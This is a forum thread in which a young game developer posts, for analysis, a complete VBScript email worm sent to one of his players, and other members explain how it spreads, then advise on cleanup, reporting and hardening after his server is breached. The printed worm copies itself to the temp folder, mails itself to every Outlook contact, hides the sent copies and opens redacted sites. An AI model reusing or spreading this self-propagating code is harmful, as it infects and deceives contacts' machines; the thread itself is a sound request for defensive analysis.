+ Post New Thread
Page 1 of 2 12 LastLast
Results 1 to 15 of 23
Coding Thread, Urgent Help Plz in Coding and Web Development; Hi all. Recently i have been making an online game and on Sunday i banned a player on there but ...
  1. #1

    Join Date
    Nov 2007
    Posts
    51
    Thank Post
    8
    Thanked 0 Times in 0 Posts
    Rep Power
    0

    Exclamation Urgent Help Plz

    Hi all. Recently i have been making an online game and on Sunday i banned a player on there but when he found out who had reported him to me he sent them a script or something.

    I worked out part of it changed their homepage to a porn site but i dunno if there is anything else in there.

    I have split it up incase there is something.

    Code:
    On Error Resume Next
    Set WS = CreateObject("WScript.Shell")
    Set FSO= Createobject("scripting.filesystemobject")
    Folder=FSO.GetSpecialFolder(2)
    
    Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
    Do While InF.AtEndOfStream<>True
    ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
    Loop
    
    Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
    OutF.write ScriptBuffer
    OutF.close
    Set FSO=Nothing
    Code:
    If WS.regread ("HKCU\software\An\mailed") <> "1" then
    Mailit()
    End If
    
    Set s=CreateObject("Outlook.Application")
    Set t=s.GetNameSpace("MAPI")
    Set u=t.GetDefaultFolder(6)
    For i=1 to u.items.count
    If u.Items.Item(i).subject="Homepage" Then
    u.Items.Item(i).close
    u.Items.Item(i).delete
    End If
    Next
    Set u=t.GetDefaultFolder(3)
    For i=1 to u.items.count
    If u.Items.Item(i).subject="Homepage" Then
    u.Items.Item(i).delete
    End If
    Next
    Code:
    Randomize
    r=Int((4*Rnd)+1)
    If r=1 then
    WS.Run("http://********.*************.net/*******/1.htm")
    elseif r=2 Then
    WS.Run("http://*******.****.com/_XMCM/*******/1.htm")
    elseif r=3 Then
    WS.Run("http://www2.*********.com/*******/******/1.htm")
    ElseIf r=4 Then
    WS.Run("http://******.******.tv/1.htm")
    End If
    Code:
    Function Mailit()
    On Error Resume Next
    Set Outlook = CreateObject("Outlook.Application")
    If Outlook = "Outlook" Then
     Set Mapi=Outlook.GetNameSpace("MAPI")
     Set Lists=Mapi.AddressLists
     For Each ListIndex In Lists
      If ListIndex.AddressEntries.Count <> 0 Then
       ContactCount = ListIndex.AddressEntries.Count
       For Count= 1 To ContactCount
        Set Mail = Outlook.CreateItem(0)
        Set Contact = ListIndex.AddressEntries(Count)
        Mail.To = Contact.Address
        Mail.Subject = "Homepage"
        Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page!
    It's really cool ;O)"&vbcrlf&vbcrlf
        Set Attachment=Mail.Attachments
        Attachment.Add Folder & "\homepage.HTML.vbs"
        Mail.DeleteAfterSubmit = True
        If Mail.To <> "" Then
        Mail.Send
        WS.regwrite "HKCU\software\An\mailed", "1"
       End If
       Next
      End If
     Next
    End if
    End Function
    Can anyone tell me if this does anything else or if i should do something about it ?

    Brendan

    PS. I didnt know if this was the right section. been a while since I been on here.

  2. #2
    contink's Avatar
    Join Date
    Jul 2006
    Location
    South Yorkshire
    Posts
    3,791
    Thank Post
    303
    Thanked 327 Times in 233 Posts
    Rep Power
    118
    Well if you have Outlook installed on that machine your entire address book will have gotten an email that tells them to go check out a porn site if I'm reading that correctly.

    It should only do it once I think but all in all I'd guess the person who received it needs to learn not to run attachments and a bit more about security!

    As to the rest it deletes your existing homepage(s) and replaces it/them with a random porn site... Oh and I believe it writes a copy of itself into a folder somewhere too..


    No idea if it would work (not about to try it!) but yeah, not the nicest nugget to send.

  3. Thanks to contink from:

    Warren-Plus (15th April 2008)

  4. #3

    SYNACK's Avatar
    Join Date
    Oct 2007
    Posts
    10,987
    Thank Post
    851
    Thanked 2,653 Times in 2,253 Posts
    Blog Entries
    9
    Rep Power
    764
    Yeap, as contink says it creates a copy of itself in the temp folder and emails itself as an attachment to everyone in the outlook address book for fun. It then writes a flag for each email sent to the registry to notify it in case it is run again so that it does not bother with the emails the the same users a second time.

    The person that sent it may not have had a choice in the matter, their machine could very well have been hijacked.
    Last edited by SYNACK; 15th April 2008 at 04:32 PM.

  5. Thanks to SYNACK from:

    Warren-Plus (15th April 2008)

  6. #4

    Join Date
    Dec 2007
    Location
    Nottinghamshire
    Posts
    187
    Thank Post
    59
    Thanked 21 Times in 19 Posts
    Rep Power
    17
    i could be way off the mark here but it looks like it uses outlook to send a vbs that changes the homepage (to 1 of 4 pages) to every one in your address book.

    please correct me if im wrong.

    started wreading before the other posts exsisted

  7. Thanks to notalot from:

    Warren-Plus (15th April 2008)

  8. #5
    ICT_GUY's Avatar
    Join Date
    Feb 2007
    Location
    Weymouth
    Posts
    2,261
    Thank Post
    646
    Thanked 283 Times in 204 Posts
    Rep Power
    104
    Nod picked it up as a threat as soon as I loaded the page up. odd that.

  9. Thanks to ICT_GUY from:

    Warren-Plus (15th April 2008)

  10. #6

    Join Date
    Nov 2007
    Posts
    51
    Thank Post
    8
    Thanked 0 Times in 0 Posts
    Rep Power
    0
    Thnx guys. Should i do anything about this ?

    Brendan

  11. #7

    SYNACK's Avatar
    Join Date
    Oct 2007
    Posts
    10,987
    Thank Post
    851
    Thanked 2,653 Times in 2,253 Posts
    Blog Entries
    9
    Rep Power
    764
    Quote Originally Posted by ICT_GUY View Post
    Nod picked it up as a threat as soon as I loaded the page up. odd that.
    Built in code filtering probably, I'm pretty sure it will do the same for jscript etc. Its a nice feature just so long as it is not tied up to a Symantec solution. When one of those gets a little confused it just breaks all web pages with scripts on them.

  12. #8

    SYNACK's Avatar
    Join Date
    Oct 2007
    Posts
    10,987
    Thank Post
    851
    Thanked 2,653 Times in 2,253 Posts
    Blog Entries
    9
    Rep Power
    764
    Quote Originally Posted by Warren-Plus View Post
    Thnx guys. Should i do anything about this ?

    Brendan
    Tell the guy to stop opening random attachments and hook himself up with a virus checker. It does not look to cause any lasting damage apart from leaving rubbish in the registry under this key HKCU\software\An\mailed. Just set the home page back and prescribe a dose of common sense for the victim.

    I would also run a spyware scan on the system as the pages that it directs you to could have hit the system with something else. I have looked through the code and can't see anything that would actually set the homepage to something different. I suspect that this was done by the page that it redirected you to rather than the script.
    Last edited by SYNACK; 15th April 2008 at 04:51 PM.

  13. Thanks to SYNACK from:

    Warren-Plus (15th April 2008)

  14. #9

    Edu-IT's Avatar
    Join Date
    Nov 2007
    Posts
    7,088
    Thank Post
    402
    Thanked 618 Times in 565 Posts
    Rep Power
    180
    He may want to contact the people in his address book too to explain.

  15. #10

    Join Date
    Nov 2007
    Posts
    51
    Thank Post
    8
    Thanked 0 Times in 0 Posts
    Rep Power
    0
    Rite this just got serious. He has now gained access to my PC (dont know how) and attacked my server and also my staff. I have him IP logged on my forums and i have another IP he uses for his server.

    What can i do ?

    Brendan

  16. #11

    GrumbleDook's Avatar
    Join Date
    Jul 2005
    Location
    Gosport, Hampshire
    Posts
    9,921
    Thank Post
    1,332
    Thanked 1,773 Times in 1,100 Posts
    Blog Entries
    19
    Rep Power
    593
    Go to your ISP, get them to get the police involved (or do so yourself).

    Whilst this may be seen to be a minor thing it is still a breach of the law.

  17. Thanks to GrumbleDook from:

    Warren-Plus (16th April 2008)

  18. #12

    FN-GM's Avatar
    Join Date
    Jun 2007
    Location
    UK
    Posts
    15,760
    Thank Post
    825
    Thanked 1,662 Times in 1,447 Posts
    Blog Entries
    11
    Rep Power
    441
    Quote Originally Posted by GrumbleDook View Post
    Go to your ISP, get them to get the police involved (or do so yourself).

    Whilst this may be seen to be a minor thing it is still a breach of the law.
    I agree with you there. What has be managed to do?

  19. #13
    contink's Avatar
    Join Date
    Jul 2006
    Location
    South Yorkshire
    Posts
    3,791
    Thank Post
    303
    Thanked 327 Times in 233 Posts
    Rep Power
    118
    I'd be looking to increase the network protection on your systems...

    - A hardware firewall would be a very good start

    - Check antivirus and malware protection

    - Review policies regarding systems use and go through the common sense stuff about not opening attachments, etc...


    If they're into your machines though I think the primary thing I'd be doing is pulling my net connection out of the wall to stop any further invasions before addressing the above through a secured system from elsewhere.

    Best of luck...

  20. #14

    Join Date
    Nov 2007
    Posts
    51
    Thank Post
    8
    Thanked 0 Times in 0 Posts
    Rep Power
    0
    Quote Originally Posted by FN-Greatermanchester View Post
    I agree with you there. What has be managed to do?
    Well he has gathered personal information about players on my game that are stored on my PC. Since posting this he came on last nite and was doing something last night.

    I still have no idea about how he got into the files or if he has done anything else to my java files. ill find out later on today when get home from school and recompile my server.

    Also does anyone here kno any cheap game hosting services. The cheapest ive found is 15 a month

    Brendan

  21. #15
    contink's Avatar
    Join Date
    Jul 2006
    Location
    South Yorkshire
    Posts
    3,791
    Thank Post
    303
    Thanked 327 Times in 233 Posts
    Rep Power
    118
    Can I assume from your comments that you're hosting a game server on a machine at home via your ADSL or cable connection?

    Can I also assume that you haven't protected this machine using a firewall or locked down the ports to the absolute minimum?

    If the question so far is "no", your really need to spend a bit of time learning about hardening your server and look to invest in a firewall... smoothwall will do an excellent job if you can find an old box from somewhere to host it on.


    As to game servers, can't help much....

    But your primary concern at this point is to notify ALL your game users that their details have been compromised and to start changing passwords on ALL their forum, online banking, etc... accounts. You can bet most of them will be using the same username/ID and password in a plethora of places so if their password (even the hash) is compromised it's only a matter of time before things like ebay, paypal, etc... start getting hacked..

    They will also need to check their AV and malware security, firewalls, etc... because you can bet your script kiddie hacker/cracker is going to be having fun with trying to crack their home PC's, email addresses and all the rest.

    In truth your game is currently the last of your problems... Some serious warnings to your users and a lot of reading up on security, etc... is a priority now.

SHARE:
+ Post New Thread
Page 1 of 2 12 LastLast

Similar Threads

  1. Urgent: Need a UPS
    By Oops_my_bad in forum Hardware
    Replies: 10
    Last Post: 23rd January 2008, 02:29 AM
  2. Please Help URGENT
    By gibboap in forum Hardware
    Replies: 18
    Last Post: 6th December 2007, 11:27 PM
  3. Urgent: NEC VT58BE
    By wesleyw in forum How do you do....it?
    Replies: 3
    Last Post: 20th May 2007, 03:47 PM
  4. Urgent screensaver
    By Grommit in forum Windows
    Replies: 5
    Last Post: 31st October 2006, 12:57 PM
  5. urgent need IE7
    By russdev in forum Windows Vista
    Replies: 8
    Last Post: 19th December 2005, 12:03 PM

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •